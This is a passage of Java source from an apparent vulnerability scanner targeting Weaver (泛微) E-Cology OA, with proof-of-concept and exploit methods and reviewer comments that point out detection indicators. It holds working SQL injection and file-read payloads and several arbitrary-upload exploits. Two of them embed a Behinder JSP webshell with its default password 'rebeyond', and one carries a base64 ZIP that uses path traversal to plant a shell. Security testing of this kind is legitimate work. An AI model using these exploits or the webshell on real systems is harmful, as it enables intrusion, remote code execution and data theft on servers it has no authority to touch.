            if (reply.statusCode != 200) {
                WriteLog("\n 不存在漏洞");
            } else {
                WriteLog("\n 存在漏洞");
                WriteLog("\n 访问地址：" + probeUrl);
            }
            break;
        default:
            // EXP has no implementation for this check.
            break;
    }
}
/**
 * Checks whether {@code /messager/users.data} on an E-Cology host is readable.
 *
 * <p>POC mode sends a plain GET and reports the target as vulnerable on any HTTP 200; the
 * response body is never inspected, so a host that answers 200 for arbitrary paths is
 * reported as vulnerable too and results need manual confirmation.
 *
 * <p>Defensive view: the path is a fixed string; access to it should require
 * authentication or be denied at the reverse proxy.
 *
 * @param type   selects the POC branch; EXP is not implemented
 * @param target base URL; the probe path is appended by plain string concatenation
 * @param args   unused
 * @throws MalformedURLException declared on the signature; presumably raised when the
 *                               HttpRequest is built from a malformed target (confirm)
 */
@VulnerabilityDescriptionMapping(
        Description = "泛微OA E-Cology users.data 敏感信息泄漏",
        SupportVulType = com.achuna33.SupportType.SupportVul.信息泄露)
public void vul_UserData(Poc_Exp type, String target, Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  泛微OA E-Cology users.data 敏感信息泄漏");

    final String probeUrl = target + "/messager/users.data";
    switch (type) {
        case POC:
            Response reply = new HttpRequest(probeUrl).Get("");
            if (reply.statusCode != 200) {
                WriteLog("\n 不存在漏洞");
            } else {
                WriteLog("\n 存在漏洞");
                WriteLog("\n 访问地址：" + probeUrl);
            }
            break;
        default:
            // EXP has no implementation for this check.
            break;
    }
}

/**
 * Probes {@code /pweb/careerapply/HrmCareerApplyPerView.jsp} for SQL injection with a
 * seven-column UNION SELECT appended to the {@code id} query parameter.
 *
 * <p>POC mode reports the target as vulnerable when the response is HTTP 200 and the body
 * contains {@code <tr class=}. The injected statement computes an MD5 value and a database
 * name, but the check does not look for either in the body; it matches a generic HTML
 * fragment only, so a positive result should be confirmed manually.
 *
 * <p>Defensive view: the probe is recognisable by {@code union select} together with
 * {@code sys.fn_sqlvarbasetostr} in the {@code id} parameter.
 *
 * @param type   selects the POC branch; EXP is not implemented
 * @param target base URL; the probe path is appended by plain string concatenation
 * @param args   unused
 * @throws MalformedURLException declared on the signature; presumably raised when the
 *                               HttpRequest is built from a malformed target (confirm)
 */
@VulnerabilityDescriptionMapping(
        Description = "泛微OA E-Cology HrmCareerApplyPerView.jsp SQL 注入",
        SupportVulType = com.achuna33.SupportType.SupportVul.SQLInjection)
public void vul_HrmCareerApplyPerView(Poc_Exp type, String target, Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  泛微OA E-Cology HrmCareerApplyPerView.jsp SQL 注入");

    final String probeUrl = target
            + "/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7";
    switch (type) {
        case POC:
            Response reply = new HttpRequest(probeUrl).Get("");
            boolean rowRendered = reply.statusCode == 200 && reply.responseBody.contains("<tr class=");
            if (!rowRendered) {
                WriteLog("\n 不存在漏洞");
            } else {
                WriteLog("\n 存在漏洞");
                WriteLog("\n 访问地址：" + probeUrl);
            }
            break;
        default:
            // EXP has no implementation for this check.
            break;
    }
}

/**
 * Checks whether the {@code WorkflowServiceXml} SOAP service answers at
 * {@code /services%20/WorkflowServiceXml}.
 *
 * <p>POC mode POSTs a {@code doCreateWorkflowRequest} envelope whose two string arguments
 * are empty and {@code 2}, and reports the target as vulnerable when the response is
 * HTTP 200 and the body contains {@code soap:Body}. That shows the service processed a SOAP
 * call; nothing beyond reachability is exercised here.
 *
 * <p>NOTE(review): the encoded space after {@code services} looks deliberate, presumably
 * to sidestep exact-match path rules (confirm). Access controls in front of
 * {@code /services/} should match on the normalised path.
 *
 * @param type   selects the POC branch; EXP is not implemented
 * @param target base URL; the probe path is appended by plain string concatenation
 * @param args   unused
 * @throws MalformedURLException declared on the signature; presumably raised when the
 *                               HttpRequest is built from a malformed target (confirm)
 */
@VulnerabilityDescriptionMapping(
        Description = "泛微OA WorkflowServiceXml xml 注入漏洞",
        SupportVulType = com.achuna33.SupportType.SupportVul.RuntimeExec)
public void vul_WorkflowServiceXml(Poc_Exp type, String target, Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  泛微OA WorkflowServiceXml xml 注入漏洞");

    // Lines are joined with "\n" and no trailing newline, matching the body sent on the wire.
    final String envelope = String.join("\n",
            "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"webservices.services.weaver.com.cn\">",
            "   <soapenv:Header/>",
            "   <soapenv:Body>",
            "      <web:doCreateWorkflowRequest>",
            "    <web:string></web:string>",
            "        <web:string>2</web:string>",
            "      </web:doCreateWorkflowRequest>",
            "   </soapenv:Body>",
            "</soapenv:Envelope>");
    final String probeUrl = target + "/services%20/WorkflowServiceXml";

    switch (type) {
        case POC:
            HttpRequest soapCall = new HttpRequest(probeUrl);
            soapCall.addHeaders("Content-Type", "text/xml;charset=UTF-8");
            Response reply = soapCall.Post(envelope);
            boolean soapAnswered = reply.statusCode == 200 && reply.responseBody.contains("soap:Body");
            if (!soapAnswered) {
                WriteLog("\n 不存在漏洞");
            } else {
                WriteLog("\n[*] 存在漏洞");
                WriteLog("\n[*] 访问地址：" + probeUrl);
                WriteLog("\n[*] 访问相关链接：https://www.anquanke.com/post/id/239865");
            }
            break;
        default:
            // EXP has no implementation for this check.
            break;
    }
}

    /**
     * Checks whether {@code /sysinterface/codeEdit.jsp} is reachable on the target.
     *
     * <p>In {@code POC} mode a single GET is sent (with a {@code text/xml} Content-Type
     * header); the target is logged as vulnerable when the answer is HTTP 200 and the body
     * contains the word {@code import}. Nothing is uploaded by this check. In {@code EXP}
     * mode nothing is sent.
     *
     * <p>NOTE(review): {@code import} is a very common token in HTML, CSS and script, so the
     * body test is weak evidence. A hit means the page was served, not that a file was
     * written; confirm manually before reporting.
     *
     * @param type   scan mode; only {@code POC} performs a request
     * @param target base URL the page path is appended to
     * @param args   not used by this check
     * @throws MalformedURLException declared by the signature; presumably raised when
     *                               {@code target} plus the path is not a valid URL
     */
    @VulnerabilityDescriptionMapping(Description = "泛微OA sysinterface codeEdit.jsp 任意文件上传漏洞",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
    public void vul_codeEdit(Poc_Exp type, String target, Object... args) throws MalformedURLException {

        WriteLog("\n[*]开始检测：  泛微OA sysinterface codeEdit.jsp 任意文件上传漏洞");

        final String pageUrl = target + "/sysinterface/codeEdit.jsp";
        switch (type) {
            case POC: {
                HttpRequest pageRequest = new HttpRequest(pageUrl);
                pageRequest.addHeaders("Content-Type", "text/xml;charset=UTF-8");
                Response page = pageRequest.Get("");
                boolean pageServed = page.statusCode == 200
                        && page.responseBody.contains("import");
                if (!pageServed) {
                    WriteLog("\n[*] 不存在漏洞");
                    break;
                }
                WriteLog("\n[*] 存在漏洞");
                WriteLog("\n[*] 访问地址：" + pageUrl);
                WriteLog("\n[*] 访问相关链接：https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA%20sysinterfacecodeEdit.jsp%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md");
                break;
            }
            default:
                // EXP (and any other mode) sends nothing for this check.
                break;
        }
    }

    @VulnerabilityDescriptionMapping(Description = "泛微OA WorkflowCenterTreeData SQL注入漏洞 ",SupportVulType = com.achuna33.SupportType.SupportVul.SQLInjection)
    public void vul_WorkflowCenterTreeData(Poc_Exp type, String target, Object... args) throws MalformedURLException {

        WriteLog("\n[*]开始检测：  泛微OA WorkflowCenterTreeData SQL注入漏洞 ");

        String url = "/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333";
        String data = "formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0
d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1";
        switch (type){
            case EXP:
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);
                httpRequest.addHeaders("Content-Type","text/xml;charset=UTF-8");
                Response result = httpRequest.Post(data);
                if(result.statusCode==200 && result.responseBody.contains("\"id\"")){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*] 访问地址："+target+url );

                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }
    /**
     * Tests the {@code weaver.file.SignatureDownLoad} servlet for file disclosure through
     * its {@code markId} parameter.
     *
     * <p>In {@code POC} mode one GET is sent whose {@code markId} carries a UNION SELECT
     * naming {@code ../ecology/WEB-INF/prop/weaver.properties}; the target is logged as
     * vulnerable when the answer is HTTP 200 and the body contains {@code ecology}. In
     * {@code EXP} mode nothing is sent.
     *
     * <p>NOTE(review): {@code ecology} is also the product's own name, so error or landing
     * pages may contain it; the match does not prove the properties file was returned. If a
     * hit is confirmed, the file should be treated as disclosed (presumably it holds
     * connection settings — verify) and any secrets in it rotated.
     *
     * @param type   scan mode; only {@code POC} performs a request
     * @param target base URL the servlet path is appended to
     * @param args   not used by this check
     * @throws MalformedURLException declared by the signature; presumably raised when
     *                               {@code target} plus the path is not a valid URL
     */
    @VulnerabilityDescriptionMapping(Description = "泛微OA E-Weaver SignatureDownLoad 任意文件读取漏洞",SupportVulType = com.achuna33.SupportType.SupportVul.信息泄露)
    public void vul_SignatureDownLoad(Poc_Exp type, String target, Object... args) throws MalformedURLException {

        WriteLog("\n[*]开始检测：  泛微OA E-Weaver SignatureDownLoad 任意文件读取漏洞 ");

        final String probeUrl = target + "/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27";
        switch (type) {
            case POC: {
                Response probe = new HttpRequest(probeUrl).Get("");
                boolean markerSeen = probe.statusCode == 200
                        && probe.responseBody.contains("ecology");
                if (!markerSeen) {
                    WriteLog("\n[*] 不存在漏洞");
                    break;
                }
                WriteLog("\n[*] 存在漏洞");
                WriteLog("\n[*] 访问地址：" + probeUrl);
                break;
            }
            default:
                // EXP (and any other mode) sends nothing for this check.
                break;
        }
    }
    /**
     * Tests (POC) or uses (EXP) the {@code KtreeUploadAction?action=image} upload servlet.
     *
     * <p>Both modes POST a multipart body that declares a {@code .jsp} file name with an
     * {@code image/jpeg} part type, together with a fixed Cookie header.
     *
     * <p>NOTE(review): the POC branch is not a read-only check. It uploads {@code test.jsp}
     * containing the marker text, and nothing in this method removes it afterwards, so a
     * scan leaves an artefact on every host that accepts the upload. The POC verdict is
     * "HTTP 200 with a non-empty body", which any catch-all page also satisfies.
     *
     * <p>For defenders: the request path, the fixed Cookie value and the hard-coded key
     * string inside the default JSP below are all static, which makes them usable as
     * search terms in access logs and in file-system sweeps of the web root.
     *
     * @param type   {@code POC} to test the upload, {@code EXP} to upload a JSP payload
     * @param target base URL the servlet path is appended to
     * @param args   EXP only: {@code args[0]} may be the path of a local file whose content
     *               replaces the built-in JSP
     * @throws MalformedURLException declared by the signature; presumably raised when
     *                               {@code target} plus the path is not a valid URL
     */
    @VulnerabilityDescriptionMapping(Description = "泛微OA E-cology KtreeUploadAction 任意文件上传",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
    public void vul_KtreeUploadAction(Poc_Exp type, String target, Object... args) throws MalformedURLException {

        WriteLog("\n[*]开始检测：  泛微OA E-cology KtreeUploadAction 任意文件上传");

        String url = "/weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image";
        // Multipart template; the literal "helloword" is the slot the EXP branch replaces.
        String payload = "----------1638451160\r\n" +
                "Content-Disposition: form-data; name=\"test\"; filename=\"test.jsp\"\r\n" +
                "Content-Type: image/jpeg\r\n" +
                "\r\n" +
                "helloword\r\n" +
                "----------1638451160--";
        switch (type){
            case EXP:
                String path = null;
                String mypayload = null;
                try {
                    path = (String) args[0];
                    try {
                        byte[] bytes = Utils.readFile(path);
                        // NOTE(review): decodes with the platform default charset.
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        // Log text: "file read failed". The exception itself is discarded.
                        WriteExpLog("\n [*] 文件读取失败");
                    }
                }catch (Exception e){
                    // NOTE(review): silently swallows a missing or non-String args[0];
                    // the code then falls back to the built-in JSP below.
                }
                // Built-in fallback JSP. The log message further down identifies it as the
                // default "冰蝎" shell with connection password "rebeyond".
                String EXP = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n";

                if (mypayload!=null){
                    EXP = mypayload;
                }else {
                    // Log text: "default shell is the 冰蝎 shell, password rebeyond".
                    WriteExpLog("\n [*] 默认shell 为冰蝎shell 密码 rebeyond");
                }
                payload = payload.replace("helloword",EXP);
                HttpRequest ExploitRequest = new HttpRequest(target+url);
                ExploitRequest.addHeaders("Cookie","Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test");
                ExploitRequest.addHeaders("Content-Type","multipart/form-data; boundary=----1638451160");

                Response exp_result = ExploitRequest.Post(payload);
                // The response body is logged as the upload location; it is not validated.
                if(exp_result.statusCode==200 && exp_result.responseBody.length()>0){
                    WriteExpLog("\n[*] 上传地址地址："+exp_result.responseBody );
                }else {
                    WriteExpLog("\n[*] 利用异常");
                }
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);
                httpRequest.addHeaders("Cookie","Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test");
                httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----1638451160");

                // Sends the unmodified template, i.e. a real upload of test.jsp.
                Response result = httpRequest.Post(payload);

                if(result.statusCode==200 && result.responseBody.length()>0){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*] 访问地址："+target+url );

                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }

    /**
     * Tests (POC) or uses (EXP) the {@code weaver.common.Ctrl} endpoint with the
     * {@code Service_CheckApp} / {@code validateApp} arguments.
     *
     * <p>POC sends a single GET with a fixed Cookie header and reports on the status code
     * only. EXP POSTs a multipart body carrying an embedded ZIP archive and then requests
     * {@code /cloudstore/helps.jsp} to see whether a file appeared there.
     *
     * <p>For defenders: the Base64 constant decodes to a ZIP whose entry name begins
     * {@code helps/../../../}, so the upload relies on the server extracting archive entries
     * without rejecting {@code ..} path segments. Validating entry paths on extraction,
     * and watching for unexpected {@code .jsp} files under {@code /cloudstore/}, address
     * what this method exercises. The request path and Cookie value are static and can be
     * searched for in access logs.
     *
     * @param type   {@code POC} for the status probe, {@code EXP} for the archive upload
     * @param target base URL the endpoint path is appended to
     * @param args   not read by the active code in this method
     * @throws Exception declared by the signature; the visible code does not show which
     *                   call raises it
     */
    @VulnerabilityDescriptionMapping(Description = "泛微OA weaver.common.Ctrl 任意文件上传漏洞",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
    public void vul_weaver_common_Ctrl(Poc_Exp type, String target, Object... args) throws Exception {

        WriteLog("\n[*]开始检测：  泛微OA weaver.common.Ctrl 任意文件上传漏洞");

        String url = "/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp";
        // Multipart head and tail; the binary archive is spliced between them in EXP.
        String payload = "----------1638451160\r\n" +
                "Content-Disposition: form-data; name=\"test\"; filename=\"helps.zip\"\r\n" +
                "Content-Type: image/jpeg\r\n" +
                "\r\n";
        String end =  "\r\n----------1638451160--\r\n";
        // Base64 of the embedded ZIP archive (see the method comment for its entry name).
        String shellCode = "UEsDBBQAAAAIACVtIlVQG0RgpAEAAJcCAAAYAAAAaGVscHMvLi4vLi4vLi4vaGVscHMuanNwXZJRb9MwFIX/iuUne0QOlBVpTVNpLUMC9jARlRfEg+Pctt5S29jXpVW1/z47gYL2do9z7pd7jz1/DG7mrUVy3PcmzJKs6Q7RzcryUR6kCNEIZffll+ahfJBboOQAPmhravpOTOhingGd9qBQH0C4ZCF676zHmg6AiLoXV0Wuj0L5k0P7WgYHSlzR8g8MVC+9xPSPBUllCGRN4IhgukBWWd9b2YE/r9l/iih+DtGBZ4pXzy62vVajm2xZe0IgP362/OwBozdkcIoONtrAYGJt8bZoRQ9mi7sEeJ6Xr2cZhgvKa4c94KJBr82WPNUUrqfwfnKzgXba3UymLa0ChByRcBG/yz4Co5EWT7xaabfLo9ZjIbaAn01AaVSy3N41lFdKaKORTQoDv0kDKg38FU5NSoixv9jUdsHyN5TyfLJMOwbGi5HDq9y/ZrjTIX8dl+SXcgyN8XTClOjsJ21kz3JPvvC9Dkosb5u7D9cfQdnBmdLK1TJuNkl6+BUhYOZ9gxElfCruU6CJmriJddmNi2SXfWD5eayswXSdvBoj/pfoqPNjXLwAUEsBAhQAFAAAAAgAJW0iVVAbRGCkAQAAlwIAABgAJAAAAAAAAQAgAAAAAAAAAGhlbHBzLy4uLy4uLy4uL2hlbHBzLmpzcAoAIAAAAAAAAQAYAABf2ZqOvtgBAAAAAAAAAAAAAAAAAAAAAFBLBQYAAAAAAQABAGoAAADaAQAAAAA=";
        switch (type){
            case EXP:
                // (A commented-out legacy EXP implementation that used to sit here has been
                // dropped from this listing: it appeared to duplicate the EXP branch of
                // vul_KtreeUploadAction and was never executed in this method.)
                byte[] bytes = Utils.base64Decode(shellCode);
                // Assemble head + archive bytes + tail into one request body.
                // NOTE(review): getBytes() without a charset uses the platform default.
                byte[] body = new byte[payload.getBytes().length+bytes.length+end.getBytes().length];
                System.arraycopy(payload.getBytes(),0,body,0,payload.getBytes().length);
                System.arraycopy(bytes,0,body,payload.getBytes().length,bytes.length);
                System.arraycopy(end.getBytes(),0,body,payload.getBytes().length+bytes.length,end.getBytes().length);

                HttpRequest httpRequest_exp = new HttpRequest(target+url);
                httpRequest_exp.addHeaders("Cookie","Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test");
                httpRequest_exp.addHeaders("Content-Type","multipart/form-data; boundary=----1638451160");
                Response result_exp = httpRequest_exp.Post(body);
                if (result_exp.statusCode==200){
                    // Follow-up GET: both 200 and 500 are treated as "file is present".
                    Response result2 = new HttpRequest(target+"/cloudstore/helps.jsp").Get("");
                    if (result2.statusCode==200||result2.statusCode==500){
                        WriteExpLog("\n[*]上传成功 shell地址："+target+"/cloudstore/helps.jsp");
                    }else {
                        // Log text: upload answered 200 but the file is not reachable;
                        // the tool guesses it was removed on the server.
                        WriteExpLog("\n[*]访问异常 状态码:"+ result2.statusCode);
                        WriteExpLog("\n[*]访问异常 .css 访问200 疑似 shell 被杀");
                    }
                }else {
                    WriteExpLog("\n[*]上传失败");
                }
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);
                httpRequest.addHeaders("Cookie","Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test");
                Response result = httpRequest.Get("");

                // Status-only verdict. The log text itself says a 200 "may" indicate an
                // access-control bypass via the .css suffix and asks for manual testing.
                if(result.statusCode==200){
                    WriteLog("\n[*] 访问返回状态码为200 .css可能出现了权限绕过，请手动测试。");
                    WriteLog("\n[*] 访问地址："+target+url );

                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
        }
    }

/**
 * Tests (POC) or uses (EXP) {@code /clusterupgrade/uploadFileClient.jsp}.
 *
 * <p>Both modes POST a multipart body whose file name is
 * {@code ../../clusterupgrade/<random>.jsp}, where {@code <random>} is a fresh
 * 4-character string from {@code Utils.getRandomString}.
 *
 * <p>NOTE(review): the POC branch is intrusive. It uploads a JSP that prints a marker,
 * then requests it, and nothing in this method deletes the file afterwards, so every
 * positive scan leaves an executable page on the target. The POC verdict is "HTTP 200
 * with a non-empty body" at the random path; the body is not compared with the marker,
 * so a catch-all 200 page also counts as a hit.
 *
 * <p>For defenders: the upload handler should reject path separators and {@code ..} in
 * client-supplied file names; unexpected {@code .jsp} files with short random names under
 * {@code /clusterupgrade/} are the artefact this method produces.
 *
 * @param type   {@code POC} to test the upload, {@code EXP} to upload a JSP payload
 * @param target base URL the page path is appended to
 * @param args   EXP only: {@code args[0]} may be the path of a local file whose content
 *               replaces the built-in JSP
 * @throws MalformedURLException declared by the signature; presumably raised when
 *                               {@code target} plus the path is not a valid URL
 */
@VulnerabilityDescriptionMapping(Description = "泛微OA uploadFileClient.jsp 任意文件上传漏洞",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
    public void vul_uploadFileClient(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA vul_uploadFileClient 任意文件上传漏洞");

    String url = "/clusterupgrade/uploadFileClient.jsp";
    String randomStr = Utils.getRandomString(4);
    // Multipart template; the literal "payload" is the slot both branches replace.
    String payload = "----------1638451160\r\n" +
            "Content-Disposition: form-data; name=\"upload\"; filename=\"../../clusterupgrade/"+randomStr+".jsp\"\r\n" +
            "Content-Type: image/jpeg\r\n" +
            "\r\n" +
            "payload\r\n" +
            "----------1638451160--";
    switch (type){
        case EXP:
            String path = null;
            String mypayload = null;
            try {
                path = (String) args[0];
                try {
                    byte[] bytes = Utils.readFile(path);
                    // NOTE(review): decodes with the platform default charset.
                    mypayload = new String(bytes);
                }catch (Exception e){
                    // Log text: "file read failed". The exception itself is discarded.
                    WriteExpLog("\n [*] 文件读取失败");
                }
            }catch (Exception e){
                // NOTE(review): silently swallows a missing or non-String args[0];
                // the code then falls back to the built-in JSP below.
            }
            // Built-in fallback JSP; the log message below names it as the default
            // "冰蝎" shell with connection password "rebeyond".
            String EXP = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n";

            if (mypayload!=null){
                EXP = mypayload;
            }else {
                WriteExpLog("\n [*] 默认shell 为冰蝎shell 密码 rebeyond");
            }
            payload = payload.replace("payload",EXP);
            HttpRequest ExploitRequest = new HttpRequest(target+url);
            ExploitRequest.addHeaders("Content-Type","multipart/form-data; boundary=----1638451160");

            Response exp_result = ExploitRequest.Post(payload);
            // Both branches print the expected location; the file is not fetched here.
            if(exp_result.statusCode==200 && exp_result.responseBody.length()>0){
                WriteExpLog("\n[*] 上传地址地址："+target+"/clusterupgrade/"+randomStr+".jsp" );
            }else {
                WriteExpLog("\n[*] 利用异常 请手动访问"+target+"/clusterupgrade/"+randomStr+".jsp");
            }
            break;
        case POC:
            // Marker JSP: prints the text "test" when executed by the server.
            payload = payload.replace("payload","<%out.print(\"test\");%>");
            HttpRequest httpRequest = new HttpRequest(target+url);
            httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----1638451160");

            // The upload response is ignored; only the follow-up GET decides the verdict.
            httpRequest.Post(payload);

            Response result = new HttpRequest(target+"/clusterupgrade/"+randomStr+".jsp").Get("");


            if(result.statusCode==200 && result.responseBody.length()>0){

                WriteSuccessLog("\n[*] 存在漏洞");
                WriteSuccessLog("\n[*] 访问地址："+target+"/clusterupgrade/"+randomStr+".jsp" );

            }else {
                WriteLog("\n[*] 不存在漏洞");
            }
}

}



    /**
     * Checks whether {@code /mobile/plugin/VerifyQuickLogin.jsp} hands out a session key
     * to a request that carries no credentials.
     *
     * <p>In {@code POC} mode the fixed form {@code identifier=1&language=1&ipaddress=1.1.1.1}
     * is POSTed; the check succeeds when the answer is HTTP 200 and the body contains
     * {@code sessionkey}. In {@code EXP} mode nothing is sent.
     *
     * <p>NOTE(review): on success the whole response body, session key included, is written
     * to the tool's log. That value is a live credential for the tested system; logs and
     * reports containing it need the same handling as passwords, and the session should be
     * invalidated once testing is finished.
     *
     * <p>NOTE(review): the annotation files this check under {@code UploadFile} although the
     * description is an arbitrary-user-login issue; this looks like a copy-paste leftover.
     *
     * @param type   scan mode; only {@code POC} performs a request
     * @param target base URL the page path is appended to
     * @param args   not used by this check
     * @throws MalformedURLException declared by the signature; presumably raised when
     *                               {@code target} plus the path is not a valid URL
     */
    @VulnerabilityDescriptionMapping(Description = "泛微OA VerifyQuickLogin.jsp 任意用户登录漏洞",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
    public void vul_VerifyQuickLogin(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("泛微OA VerifyQuickLogin.jsp 任意用户登录漏洞");
        final String endpoint = target + "/mobile/plugin/VerifyQuickLogin.jsp";
        final String form = "identifier=1&language=1&ipaddress=1.1.1.1";
        switch (type) {
            case POC: {
                Response reply = new HttpRequest(endpoint).Post(form);
